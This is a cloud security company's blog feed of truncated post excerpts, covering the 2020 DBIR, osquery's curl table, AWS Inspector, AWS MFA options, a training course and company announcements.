Tenchi Security (EN)At Tenchi Security, we provide consulting services and products to help your organization embrace the benefits of the cloud in a secure and compliant fashion. Our work will help security transition from a blocker to an enabler of the business teams' pursuit of the increased flexibility, scalability, automation, and savings of the cloud.https://www.tenchisecurity.com/
Two Main Takeaways from the 2020 DBIR for Cloud SecuritySat, 23 May 2020 04:54:43 -0700https://www.tenchisecurity.com/blog/two-main-takeaways-from-the-2020-dbir-for-cloud-security
https://www.tenchisecurity.com/blog/two-main-takeaways-from-the-2020-dbir-for-cloud-security<p>If you've been hiding under a rock for the last 13 years, let me share with you that the <a target="_blank" href="https://enterprise.verizon.com/resources/reports/dbir/">Verizon Data Breach Investigations Report</a> (DBIR) is the longest running data-driven report on the state of information security. It is highly respected because of the sound statistical methodologies used, the quality of the teams behind it over time, and the uniquely rich data set contributed by Verizon and hundreds of relevant contributors.</p><p>I am very passionate about the need for making data-driven decisions in the realm of information security. So much of what passes for wisdom in our industry reminds me of the pre-scientific evolution of medicine. We need well written, properly executed studies using good data sets, like the DBIR and the many reports published by others such as the enlightened folk at <a target="_blank" href="https://www.cyentia.com/">Cyentia Institute</a>. These reports are a breath of fresh air and give me hope that we can make better decisions going forward.</p><p>In this post, I will highlight my own personal and subjective selection of the two most relevant lessons learned for cloud security on the recently published 2020 edition of the DBIR.</p><h3><p>The Reign of Pain Falls Mainly on the Control Plane</p></h3><p>There is a clear theme on the 2020 DBIR around the use of illegitimately obtained credentials. So let's see what the DBIR has to say about how often stolen or lost credentials were used in the actual breaches they studied:</p><p>One of the most relevant things about cloud security is that there is this entire new attack surface comprised of the cloud service provider's APIs, commonly called the <em>control plane</em>. Differently from the management interfaces of on-premises IT infrastructure, the control plane is Internet accessible, shared by all customers and widely known and documented.</p><p>This clearly underscores how critical the issue of...<a href=https://www.tenchisecurity.com/blog/two-main-takeaways-from-the-2020-dbir-for-cloud-security>Read More</a>Abusing the osquery "curl" table for pivoting into cloud environmentsTue, 12 May 2020 15:17:07 -0700https://www.tenchisecurity.com/blog/abusing-the-osquery-curl-table-for-pivoting-into-cloud-environments
https://www.tenchisecurity.com/blog/abusing-the-osquery-curl-table-for-pivoting-into-cloud-environments<h3><p>About osquery</p></h3><p>IT professionals often need to answer questions about what is happening in the operating systems of the fleet they manage or secure. Needs would include performance management, software inventories, or even threat hunting and incident response. In order to solve this problem using an easy to use interface, Facebook created <a target="_blank" href="https://osquery.io">osquery</a> in 2014, and published it as open source software.</p><p>The way osquery works is by offering relational tables (some of which are general and others which are OS-specific) which can be queried using SQL and allow you to inspect live information from hosts in your fleet. The information offered through this simple model would otherwise require complex and varied methods for collection and normalization, so this is a huge win.</p><p>There are currently 257 tables that can be queried, which are listed at <a target="_blank" href="https://osquery.io/schema/">https://osquery.io/schema/</a>. The combination of tables and the queries allows IT and security professionals to answer a variety of questions which can then be continuously monitored (through scheduled queries), with optional alerts if particular values are found or if changes in certain values are detected.</p><p>One big underlying assumption, though, is that osquery takes great care to not allow anyone to obtain potentially confidential data from the hosts or environment they run on. For example, great care was taken to not allow reading arbitrary files by default through osquery. This is a great principle to follow.</p><p>It is also important to note that, since it's open source, osquery is widely used in an explicit or hidden way in several management and security offerings such as those in the MDR, MSSP and EDR categories.</p><h3><p>Exploiting the curl table</p></h3><p>This is when we need to bring up the existence of the curl table in osquery. Querying this table allows you to perform a variety of...<a href=https://www.tenchisecurity.com/blog/abusing-the-osquery-curl-table-for-pivoting-into-cloud-environments>Read More</a>Using Amazon AWS InspectorWed, 19 Feb 2020 10:59:30 -0800https://www.tenchisecurity.com/blog/using-amazon-aws-inspector
https://www.tenchisecurity.com/blog/using-amazon-aws-inspector<h3><p>What is AWS Amazon Inspector?</p></h3><p><a target="_blank" href="https://aws.amazon.com/inspector/">Amazon Inspector</a> is an AWS Service that provides compliance checks, best practices, and checks for known vulnerabilities in installed applications in your operating system. It requires that an agent be installed on your cloud instances. Amazon Inspector evaluations help you find excessively permissive access control and vulnerabilities in your EC2 instances. Checks are grouped on packages with pre-defined rules that are split into four different categories.</p><p>Inspector classifies its findings into four different levels of severity;</p><p><b>High</b> – Describes a security issue that can result in a compromise of the information confidentiality, integrity, and availability within your assessment target. We recommend that you treat this security issue as an emergency and implement an immediate remediation.</p><p><b>Medium</b> – Describes a security issue that can result in a compromise of the information confidentiality, integrity, and availability within your assessment target. We recommend that you fix this issue at the next possible opportunity, for example, during your next service update.</p><p><b>Low</b> - Describes a security issue that can result in a compromise of the information confidentiality, integrity, and availability within your assessment target. We recommend that you fix this issue as part of one of your future service updates.</p><p><b>Informational</b> – Describes a particular security configuration detail of your assessment target. Based on your business and organization goals, you can either simply make note of this information or use it to improve the security of your assessment target.</p><h3><p>Rules Packages</p></h3><ol><li><p><strong>CIS Benchmark </strong><br>The CIS Security Benchmarks program provides well-defined, unbiased, consensus-based industry best practices to help organizations assess and improve their...<a href=https://www.tenchisecurity.com/blog/using-amazon-aws-inspector>Read More</a>Tenchi Security announces cloud infrastructure security training courseMon, 16 Dec 2019 11:41:16 -0800https://www.tenchisecurity.com/blog/tenchi-security-announces-cloud-infrastructure-security-training-course
https://www.tenchisecurity.com/blog/tenchi-security-announces-cloud-infrastructure-security-training-course<p>Most infrastructure, operations, development and security teams are struggling to keep up with the pace of change of IT environments. In no area is this more true than in the cloud, given the frantic pace of new functionality and the race to migrate and meet business goals. The outcome has been a number of incidents and data leaks caused by the incorrect use of cloud infrastructure. In line with its mission to help organizations use public cloud securely, Tenchi Security is proud to announce the first open class of its <a target="_blank" href="https://uploads.strikinglycdn.com/files/718fb597-4bf6-46b5-93d5-d77685aa1c67/AWS%20Cloud%20Infrastructure%20Security%20A4%20en_US.pdf?id=205796">AWS Cloud Infrastructure Security course</a>.</p><p>A Gartner study shows that <a target="_blank" href="https://www.gartner.com/smarterwithgartner/is-the-cloud-secure/">through 2025, 90% of the organizations that fail to control public cloud use will inappropriately share sensitive data</a>. Most leaks will happen due to the lack of proper expertise on how to securely configure, operate, develop and design infrastructure and applications on cloud environments. It's only natural that teams used to dealing with on-premises environments need to be properly trained to be able to properly use something as disruptive as the public cloud. There are a variety of tools, techniques and best practices that can be used to avoid or mitigate these issues, but they will only be used by teams that have the requisite cloud security knowledge.</p><p>The <strong>AWS Cloud Infrastructure Security</strong> course was developed precisely to address this knowledge gap. It aims to empower your development, operations, architecture and security teams to apply sound security practices on their daily work. This is a fundamental course, that will cover the secure use of the AWS main Infrastructure as a Service (IaaS) offerings. Its content is appropriate to all technical professionals that will have...<a href=https://www.tenchisecurity.com/blog/tenchi-security-announces-cloud-infrastructure-security-training-course>Read More</a>AWS Two Factor Authentication - what are the differences between SSO and IAM?Thu, 14 Nov 2019 13:27:08 -0800https://www.tenchisecurity.com/blog/aws-two-factor-authentication-what-are-the-differences-between-sso-and-iam
https://www.tenchisecurity.com/blog/aws-two-factor-authentication-what-are-the-differences-between-sso-and-iam<p>One of the most challenging topics in AWS security is controlling access to the management APIs, also known as the control plane. Cloud security incidents are frequently caused by misconfiguration of privileges, ranging from the ubiquitous world-readable S3 bucket to use of ill-gotten credentials for users or roles with excessive access permissions.</p><p>The <a target="_blank" href="https://docs.aws.amazon.com/pt_br/IAM/latest/UserGuide/introduction.html">IAM</a> service is the foundation of AWS security, since it controls authentication and authorization of access to the AWS APIs. It allows the usage of multi-factor authentication (MFA) and granular policies and integrated and support the entire AWS service ecosystem.</p><p><span style=" text-align: initial;">For organizations with non-trivial AWS environments, though, it is imperative to segregate their environment into separate AWS accounts. The segregation allows for better access management and also containment of the blast radius of any security incidents. This approach creates a challenge, though, since IAM user accounts are restricted in scope to a single AWS account. The <a target="_blank" href="https://aws.amazon.com/answers/security/aws-secure-account-setup/">best practice</a> is to use an identity federation service to grant controlled access to the different AWS accounts, avoiding the creation of a huge number of IAM user accounts and credentials.</span></p><p>It was precisely to support this federation that <a target="_blank" href="https://aws.amazon.com/single-sign-on/">AWS Single Sign-On (SSO)</a> was created. It allows the use of an internal user directory or integration with a cloud-based or on-premises Active Directory to easily grant users controlled access to a variety of AWS accounts.</p><p>Until recently, the only way use SSO with MFA was to integrate it to an Active Directory environment that was configured to enforce MFA. In late October, though, <a target="_blank"...<a href=https://www.tenchisecurity.com/blog/aws-two-factor-authentication-what-are-the-differences-between-sso-and-iam>Read More</a>Tenchi Security acquires BlueOpsMon, 14 Oct 2019 08:22:35 -0700https://www.tenchisecurity.com/blog/tenchi-security-acquires-blueops
https://www.tenchisecurity.com/blog/tenchi-security-acquires-blueops<p>BlueOps, a training and consulting company, was acquired today by Tenchi Security, a cloud security company. Its services and will be incorporated into the Tenchi Seurity portfolio of cloud centric security services.</p><p>The <a target="_blank" href="https://www.isc2.org/resource-center/reports/cloud-security-report">(ISC)<sup>2</sup> 2019 Cloud Security Report</a> shows that the lack of internal expertise and training of internal teams is perceived by survey respondents as the greatest barrier for the adoption of cloud security tools at enterprises, as indicated by 41% of responses. It also shows that training and certification of internal staff are the top corrective measures companies are planning to adopt, with 51% of responses.</p><p>This is a clear sign that the learning curve of cloud technologies is presenting a serious challenge presented to organizations and teams used to operating and securing on-premises environments. There is a staggering number of cloud security incidents caused by misconfigurations, which could have been avoided or at least mitigated by properly trained development, IT and security teams.</p><p><br>"We are seeing a strong market demand for services geared towards security monitoring and incident response in cloud environments", says Alexandre Sieira. He continues "the intellectual property and amazing talent we are bringing in as part of this acquisition will be essential in meeting this demand with the desired level of quality".</p><p>BlueOps was founded in 2017 by Rodrigo Monto and Felipe Espósito, experienced security professionals and researchers with an international profile. Their aim was to create quality content and provide training in the area of defensive information security. Both Montoro and Espósito will join the Tenchi Security team after the acquisition, leading cloud security research and training activities.</p><p>Felipe Espósito graduated in Information Technology at UNICAMP and has a master's degree in...<a href=https://www.tenchisecurity.com/blog/tenchi-security-acquires-blueops>Read More</a>Tenchi Security expands executive team with Dani DilkinWed, 09 Oct 2019 06:21:29 -0700https://www.tenchisecurity.com/blog/tenchi-security-expands-executive-team-with-dani-dilkin
https://www.tenchisecurity.com/blog/tenchi-security-expands-executive-team-with-dani-dilkin<p>Dani Dilkin is joining Tenchi Security, a cloud security startup founded by Alexandre Sieira, to lead the services delivery practice as a Senior Partner.</p><p>The executive will have the mission to bring cloud security initiatives to the market, management teams and boards in a way that is tightly aligned with business objectives and strategy.</p><p>Dilkin is a seasoned information security executive with over 20 years experience. He recently led the planning, sales and service delivery of cyber security of Kroll and Deloitte in Brazil. Before that, he worked at NET, Terra, CIPHER and Getronics.</p><p>Dilkin was one of the pioneers of payment card industry security in Brazil, was one of the first professionals in the country to be certified as a PCI QSA and was a part of the compliance efforts of the leading payment industry players in the country. In addition he is known for his deep expertise in risk assessment and management, compliance, crisis management, incident response, complex project management and delivery working at large enterprises of different verticals. Dilkin is also a member of the Brazilian Association for Internet of Things (ABINC).</p><p><strong>"</strong>Dani has ample experience in structuring leading sales and consulting teams in the information security market, and him joining the company will be instrumental in helping us meet the strong demand we are getting from the market", says Alexandre Sieira, founder of Tenchi Security.</p><p><a target="_blank" href="https://www.gartner.com/en/newsroom/press-releases/2019-04-02-gartner-forecasts-worldwide-public-cloud-revenue-to-g">Gartner projects that the public cloud market will reach $214 billion US dollars in 2019, and that the YoY growth for Infrastructure as a Service (IaaS) will be over 27%.</a> This is a reflection of the growing adoption of cloud services by companies of all sizes and verticals aiming to rationalize costs and gain operational flexibility, agility and...<a href=https://www.tenchisecurity.com/blog/tenchi-security-expands-executive-team-with-dani-dilkin>Read More</a>